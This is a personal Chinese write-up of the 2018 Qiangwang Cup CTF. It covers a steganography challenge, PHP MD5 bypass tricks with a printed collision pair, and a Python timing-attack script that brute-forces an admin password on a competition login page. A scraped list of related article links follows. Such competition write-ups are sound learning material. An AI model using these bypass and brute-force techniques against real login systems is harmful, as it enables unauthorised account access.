【打醬油】2018強網杯個人小結
2018強網杯已經過去很久了
剛好再整理一下通過這次比賽的一些個人收穫
最後感慨,自己實在太渣,要保持勤奮不斷前進
0x01 welcome
一道簡單的misc,給出了一張圖片,直接拖到Stegsolve處理
在offset為80和100的時候可以看到flag
0x02 Web簽到
這題考察PHP的MD5繞過,總共有三關
其中第一關是0e弱型別比較
第二關是陣列繞過MD5比較
第三關無法繞過,只能找到真正的MD5碰撞
關於MD5碰撞,已經有現成的成果可以使用,曾經王曉雲教授提出過成果
這裡使用的碰撞對是
0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef
和
0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef
還可以使用碰撞對
在hackbar中通過自帶的hex轉char功能進行轉換,最後post通過
0x03 3pigs
這題一直沒有被人拿下,是web+pwn的題目
充滿好奇去嘗試了下,雖然沒有結果,但是過程還是記錄一下
訪問題目連結後是一個登入介面,嘗試sql注入等,並沒有漏洞點
檢視原始碼發現註釋中提示timing attack,既時序攻擊,於是寫程式碼進行爆破
時序攻擊的介紹可以參考
https://www.zhihu.com/question/20156213
大致就是服務端對錯誤密碼處理的響應時間有細微差異,假如逐位進行密碼驗證,則連續位數正確越多的密碼,伺服器返回時間越長
這裡給出手動爆破的python指令碼
#coding:utf-8
import requests
url="http://39.107.33.62:31927/login.php"
post={
"team":"icq15f6add5d952d9d8efac6c045970a",
"username":"admin",
"password":""
}
maxtime=0
char=""
for i in range(34,127):
avgtime=0
c = chr(i)
#這裡進行諸位手動爆破
post["password"]="I10ve3P|g"+c+"*"*0
# I10ve3P|g~
response = requests.post(url, data=post)
avgtime = response.elapsed.microseconds
if avgtime > maxtime:
maxtime=avgtime
char = c
print(post["password"]+":"+str(avgtime)+" "+response.text)
if "Failed" not in response.text:
print("success!!")
f=open("success.txt","a")
f.write(post["password"])
f.close()
print(char)
最後得到登入密碼是
I10ve3P|g~
登入後進入新的頁面
和這幾隻豬死磕了很久都沒有思路,最後GG
相關文章
- 劉強東:未來除了順豐和京東 其他快遞只能“打醬油”JD
- 如何挑選好醬油
- 繼承、抽象個人小結繼承抽象
- vue個人小專案總結Vue
- [網鼎杯 2018]Fakebook
- 2024強網杯-misc
- [強網杯]賭徒
- 三哥30秒開場白拿下面試機會,你卻還在 Career Fair 打醬油?面試AI
- 2024 強網杯逆向 Writeups
- E62 樹形DP P8677 [藍橋杯 2018 國 A] 採油
- 普洱熟茶為什麼會沖泡出醬油色?
- [護網杯 2018]easy_tornado
- [強網杯 2019]隨便注
- 2024強網杯web題解Web
- 強網杯 2021 baby_diary
- 2021強網杯Reverse-LongTimeAgoGo
- 關於 Flask Web 開發的個人小結FlaskWeb
- BMZCTF:2018 護網杯 easy_dump
- [強網杯 2019]隨便注 1
- c/c++ 溢位、越界、洩漏個人小結C++
- 熵、資訊量、資訊熵、交叉熵-個人小結熵
- 2019-強網杯pwn復現--兩題
- Web_BUUCTF_WriteUp | [強網杯 2019]隨便注Web
- 立即報名參加第三屆強網杯!
- 2019-強網杯pwn復現--多數題目
- 第三屆“強網杯”倒數計時5天!
- 第三屆“強網杯”報名倒數計時!!!
- 以"2021強網杯unicorn_like_a_pro"入門unicorn
- Flutter個人小知識點記錄Flutter
- 個人小程式接入支付解決方案
- 關於github的全方位使用和與個人小組專案結合Github
- 打個總結:Web效能優化Web優化
- 2018年個人總結
- 誠邀各界網安精英,決戰第三屆中國“強網杯”
- 智慧油氣田視覺化,打造油氣田管控的“最強大腦”視覺化
- 收藏!第三屆強網杯報名指南新鮮出爐。
- 第三屆“強網杯”全國網路安全挑戰賽圓滿落幕
- 火螢醬 | 讓你的桌面就是醬的效率!